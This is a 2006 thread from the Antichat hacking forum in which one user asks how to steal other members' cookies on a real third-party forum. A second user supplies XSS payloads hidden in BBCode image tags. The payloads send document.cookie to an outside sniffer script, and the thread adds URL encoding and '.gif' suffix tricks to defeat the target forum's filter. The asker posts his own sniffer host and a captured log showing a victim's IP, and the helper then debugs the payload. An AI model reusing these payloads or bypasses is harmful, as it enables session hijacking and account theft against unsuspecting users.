Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.07.2006, 17:15
|
|
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588
Репутация:
1
|
|
cookie stealing HELP!!
Hi There is a forum I want to steal user's cookie information,
I tried some methods like
Код:
[img]j a v a s c r i p t:alert(document.cookie).jpg[/img]
I posted this and code alerted on the screen with cookie information but ı want this code to send my cookie logger because when it alert on the screen no use for me , is there a code send cookie to my logger 
Последний раз редактировалось !!RapBoy!!; 31.08.2006 в 01:47..
|
|
|
02.07.2006, 17:57
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
If it's working, you can try somthing like this
[img]j a v a s c r i p t:img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie[/img]
maybe, you'll need to change " to '
|
|
|
|
02.07.2006, 18:03
|
|
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588
Репутация:
1
|
|
Сообщение от hidden
If it's working, you can try somthing like this
[img]j a v a s c r i p t:img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie[/img]
maybe, you'll need to change " to '
I already tried this code but Forum does not allow to post. it says IMG tags are not allowed to post .. 
|
|
|
|
02.07.2006, 18:14
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
try this
[img]j a v a s c r i p t:%69%6D%67%3D%6E%65%77%2F%2A%2A%2F%49%6D%61%67%65 %28%29%3B%69%6D%67%2E%73%72%63%3D%27%68%74%74%70%3 A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67% 69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%27%2B%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65[/img]
it's the same, but URL encoded
|
|
|
|
02.07.2006, 19:04
|
|
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588
Репутация:
1
|
|
Сообщение от hidden
try this
[img]j a v a s c r i p t:%69%6D%67%3D%6E%65%77%2F%2A%2A%2F%49%6D%61%67%65 %28%29%3B%69%6D%67%2E%73%72%63%3D%27%68%74%74%70%3 A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67% 69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%27%2B%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65[/img]
it's the same, but URL encoded
I tried a lot of encoding methods but not succesful, Forum error says: THE FOLLOWING ERROR(S) WERE FOUND
You are not allowed to use that image extension on this board. A valid format is: http://www.domain.com/picture.gif, an invalid format is: http://www.domain.com/picture.one.gif
|
|
|
|
02.07.2006, 19:23
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
Maybe, it should have .gif on the end
[img]j a v a s c r i p t:%69%6D%67%3D%6E%65%77%2F%2A%2A%2F%49%6D%61%67%65 %28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3 A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67% 69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B.gif[/img]
or
[img]j a v a s c r i p t:%69%6D%67%3D%6E%65%77%2F%2A%2A%2F%49%6D%61%67%65 %28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3 A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67% 69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%2F/image.gif[/img]
don't forget about %3B%2F/ is't ;//
|
|
|
|
02.07.2006, 19:54
|
|
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588
Репутация:
1
|
|
Сообщение от hidden
Maybe, it should have .gif on the end
[img]j a v a s c r i p t:%69%6D%67%3D%6E%65%77%2F%2A%2A%2F%49%6D%61%67%65 %28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3 A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67% 69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B.gif[/img]
or
[img]j a v a s c r i p t:%69%6D%67%3D%6E%65%77%2F%2A%2A%2F%49%6D%61%67%65 %28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3 A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67% 69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%2F/image.gif[/img]
don't forget about %3B%2F/ is't ;//
I tried .gif in the end it is a good idea  and forum accepted it but I checked www.antichat.ru/sniff/log.php there is no cookie code bypassed but did not send any cookie to log.php
|
|
|
|
02.07.2006, 21:02
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
Not long time ago, someone public, a new online sniffer, but it's allmost in russian, if you understend some russian or you have translater, you can sing up on it.
Sniffer
There is the Post |
|
|
|
04.07.2006, 22:41
|
|
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588
Репутация:
1
|
|
I have my own sniffer , İt is older version but perfect 
I have a question again (:
I tried this code
Код:
[img]j a v a s c r i p t:img%3Dnew%2F**%2FImage%28%29%3Bimg.src%3D%22http%3A%2F%2Fku-pa.com%2Fmines%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie.gif[/img]
Cookie received by my sniffer like this:
IP: xx.248.35.109
COOKIE: undefined
GÖNDEREN: http://support.gorsk.net/forum/index.php?showtopic=528&st=0&gopid=3181&#entry3181
TARAYICI: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
İt says ''undefined'' (cookie part) |
|
|
|
04.07.2006, 23:01
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
Of course, there's undefined property document.cookie.gif and I showed to you this document.cookie//image.gif . It's comment //.
chenge this
/**/ to %20
+ to %2B
" to %27
//.gif to %2F/img.gif
P.S. What's wronrg in this site, why you wonna hack it?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
